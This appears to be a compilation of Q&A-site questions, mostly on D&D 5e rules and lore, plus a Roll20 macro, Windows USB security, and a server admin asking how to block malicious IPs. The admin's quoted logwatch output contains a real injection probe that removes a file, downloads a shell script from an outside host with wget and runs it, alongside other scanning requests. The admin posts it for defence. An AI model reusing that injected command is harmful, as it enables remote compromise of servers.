What happens if a Divination wizard uses the Portent feature to replace an enemy’s initiative roll, when the DM rolls once for a group of enemies?

Say 4 goblins ambush a level 2 party, everyone is surprised but the Wizard decides to use his Portent feature to influence the initiative roll of the enemy. One of his portents is a natural 1, and he uses that die to replace the initiative roll.

Do all 4 of the goblins’ initiative change to 1 or does just one goblin change?

Here’s what I got from a reading of the PHB:

PHB 189

Initiative

… When combat starts, every participant makes a Dexterity Check to determine their place in the initiative order. The DM makes one roll for an entire group of identical creatures, so each member of the group acts at the same time…

Emphasis mine. Reading the bolded text, it seems that in cases of identical creatures, Portent can effectively cripple the entire initiative of the opposing team.

However, when you read the first sentence, it seems that the entire group shouldn’t be crippled by a single portent roll as each creature should be rolling separately and the bolded text really just says, “hey, don’t waste your time on rolling for each goblin. Just roll once and they all go together.”

A big factor of my hesitance to rule on the side of the first interpretation, is that it seems too overpowered for a 2nd-level feature.

So which is which? Am I missing something?

Can an Order of the Mutant Blood Hunter benefit from multiple instances of the same Mutagen at once?

The Order of the Mutant archetype of the Blood Hunter class has the ability to use mutagens to increase ability scores.

The rule for using mutagens reads in part:

As a bonus action you can consume a single mutagen, and the effects and side effects last until you finish a short or long rest, unless otherwise specified. While one or more mutagens are affecting you, you can use an action to focus and flush the toxins from your system, ending the effects and side effects of all mutagens.

So a Blood Hunter can clearly have more than one mutagen in effect at the same time, but could the Blood Hunter have the same mutagen in effect simultaneously?

Specifically, could a Blood Hunter use two instances of the Potency mutagen to increase her strength score to 26? I’m not sure if the rules for combining spells applies since the ability isn’t a spell (or even described as being magic).

Can players resurrect their old, dead characters, once they’re a higher level?

Resurrection can revive someone that has been dead for less than a century. So let’s say my level 5 druid dies and I make a barbarian to continue adventuring with my party, then a year later when we are high enough, our Cleric wants to resurrect my druid from way back when (remembering where we buried the body).

This feels like it definitely can happen, right? If so, then won’t most dead characters be able to come back, eventually, especially at higher levels? Almost feels like death isn’t as permanent as I thought it should be, unless if I’m missing something?

Ecology of green slime: What happens to it once it has dropped, if it’s immobile?

I own two books describing Dungeons and Dragons green slime: the Monstrous Manual for 2nd Edition and the Dungeon Master’s Guide for 3.5. In both, green slime sticks to a ceiling until, upon detecting prey, it drops on and consumes said prey, potentially turning it into more green slime.

However, both sources describe green slime as immobile. So how does green slime get on that ceiling in the first place?

The sources vaguely mention green slime grows back from spores even after it’s been burned away, but what happens to a green slime glob that’s already dropped? Does it just stay on the floor, eventually starving? (I assume no sane creature would step on it.)

Question

Is there an official or unofficial ecology of green slime (from any D&D edition) that explains the green slime life cycle, justifies its feeding habits, and expands upon its typical behaviour? Particularly, how does “A glob of green slime drops on prey and turns it into green slime” lead to more green slime on the ceiling?

How can I cast two spells at once, while knowing neither?

I’m trying to settle an argument about Tiamat. To prove my point, I want Tiamat to have Celerity as a contingent spell. However, she knows neither spell and the wording of Contingency seems to make it clear that she essentially needs to cast both spells at once. How can this be done without learning these spells?

Note: She has access to Alter Reality and therefore I can safely say that just about anything is within her reach. An ideal answer will assume no more resources or cheese than what is given by a strict RAW reading of the Notes section of Alter Reality. Additionally, Tiamat must be the one to do it – no getting help from elsewhere. I promise that this is a very light set of restrictions.

Can somebody straighten my (hopefully) confusion about USB device security in Windows once and for all?

Am I really understanding things correctly if I claim that:

  1. If an USB stick/device is inserted into a PC running Windows, currently in “lock screen” mode (that is, somebody has pressed WinKey + L), it will auto-mount it behind the scenes?
  2. If an USB stick/device is inserted into a PC running Windows, currently NOT in “lock screen” mode, it will auto-mount it by default?
  3. In both cases above, will it ever run any kind of executable found on it by default? (Like which I believe used to be the case for setup.exe on CD-ROMs back in the day.)
  4. Regardless of all of the above, will Windows ever auto-install DRIVERS found on the device itself when inserted into the PC (with or without lock screen)? Or is just the “device id” grabbed from the stick/device and then the appropriate drivers are downloaded from Microsoft’s secure, curated servers based on the device id?
  5. Why exactly are “drivers” needed whatsoever? Isn’t it using the USB standard? And also the “mass storage” standard? I don’t understand why it would ever need special “drivers” for a standard device…?
  6. Is the idea that sticking a USB stick/device into a PC is insecure in itself complete nonsense? Is not the truth that the user would have to actively select “Yes, please install the drivers from this random unknown device” or “Yes, please run this untrusted EXE found on this stick you just inserted and which I auto-mounted for you but would never run anything on without your active consent”? I get the same feeling as when people claim to get “hacked” constantly, but then it turns out they ran some binary e-mail attachment or clicked a big red box saying: “WARNING! Do you really want to run this EXE from sketchy-hack-toolz-4-u.ru?”… but nothing would surprise me at this point, frankly.

I wonder this both for the current Windows 10 and also for all previous versions of Windows.

How do I make a Roll20 macro that prompts the user for a save type once, and then outputs the save as though you clicked it on the character sheet?

How do I make a macro for Roll20 that will prompt the user for a save type once, and then roll a save for the chosen ability and output it in a format that matches the format of if they clicked it on the character sheet?

I have the following macro kindly provided by MikeQ in answer to this question – How do I make this Roll20 macro for saving throws work while only asking for the type once? – but the format isn’t the same:

@{selected|token_name} rolls a ?{Save |STR,[[1d20+@{selected|strength_save_bonus}]]/[[1d20+@{selected|strength_save_bonus}]] for a strength |DEX,[[1d20+@{selected|dexterity_save_bonus}]]/[[1d20+@{selected|dexterity_save_bonus}]] for a dexterity |CON,[[1d20+@{selected|constitution_save_bonus}]]/[[1d20+@{selected|constitution_save_bonus}]] for a constitution |INT,[[1d20+@{selected|intelligence_save_bonus}]]/[[1d20+@{selected|intelligence_save_bonus}]] for an intelligence |WIS,[[1d20+@{selected|wisdom_save_bonus}]]/[[1d20+@{selected|wisdom_save_bonus}]] for a wisdom |CHA,[[1d20+@{selected|charisma_save_bonus}]]/[[1d20+@{selected|charisma_save_bonus}]] for a charisma } save! 

It yields output of “[character name] rolls a [1d20+mod]/[1d20+mod] for a [type] save!” in the chat.

Can an Artificer learn the same infusion more than once?

The Artificer class’s infusions is one of it’s main features, and it says this about creating infusions:

You must touch each of the objects, and each of your infusions can be in only one object at a time

So, I can only infuse one item with one learned infusion. However, nowhere does it explicitly say that I can’t learn the same infusion twice. So the question is, by this reading, can I learn the same infusion twice, and use it on two different objects by doing so?

How do I immediately block IPs once they do a single malicious act?

I get this in logwatch

 A total of 21 sites probed the server      1.144.111.208     123.31.43.40     174.216.5.13     185.156.177.234     188.175.196.105     188.71.236.121     197.229.2.33     197.229.2.44     197.229.2.89     223.206.234.87     69.123.106.157     71.80.149.79     73.240.179.91     73.25.58.45     73.85.133.118     75.66.221.173     78.49.31.220     85.107.113.45     89.172.162.25     94.199.18.198     99.203.97.108    Requests with error response codes     400 Bad Request        /: 12 Time(s)        /admin/index.php: 1 Time(s)        /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91. ... sh+.j;echo+DONE: 1 Time(s)        null: 1 Time(s)     404 Not Found        /modules/base/js/owa.tracker-combined-min.js: 29 Time(s)        /robots.txt: 23 Time(s)        /cgi-bin/file_transfer.cgi: 11 Time(s)        /administrator/: 3 Time(s)        /TP/html/public/index.php: 2 Time(s)        /TP/index.php: 2 Time(s)        /TP/public/index.php: 2 Time(s)        /ads.txt: 2 Time(s)        /elrekt.php: 2 Time(s)        /html/public/index.php: 2 Time(s)        /index.php: 2 Time(s)        /public/index.php: 2 Time(s)        /thinkphp/html/public/index.php: 2 Time(s)        /HER7400Watt: 1 Time(s)        /admin/config.php?password[]=bebydviyx&username=admin: 1 Time(s)        /api/v1: 1 Time(s)        /sitemap.xml: 1 Time(s)     405 Method Not Allowed        ip.ws.126.net:443: 1 Time(s)     408 Request Timeout        null: 21 Time(s) 

Some activities are never coming from a good place.

How do I immediately block them once they do a single one of those activities?